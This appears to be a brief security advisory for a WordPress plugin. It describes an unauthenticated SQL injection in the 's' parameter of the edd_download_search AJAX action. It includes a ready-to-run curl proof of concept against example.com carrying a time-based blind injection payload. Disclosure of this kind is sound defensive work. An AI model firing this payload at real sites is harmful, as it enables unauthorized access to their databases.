The plugin does not properly sanitise and escape the s parameter before using it in a SQL statement via the edd_download_search AJAX action , leading to a SQL injection exploitable by unauthenticated users
curl "https://example.com/wp-admin/admin-ajax.php?action=edd_download_search&s=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)--+-"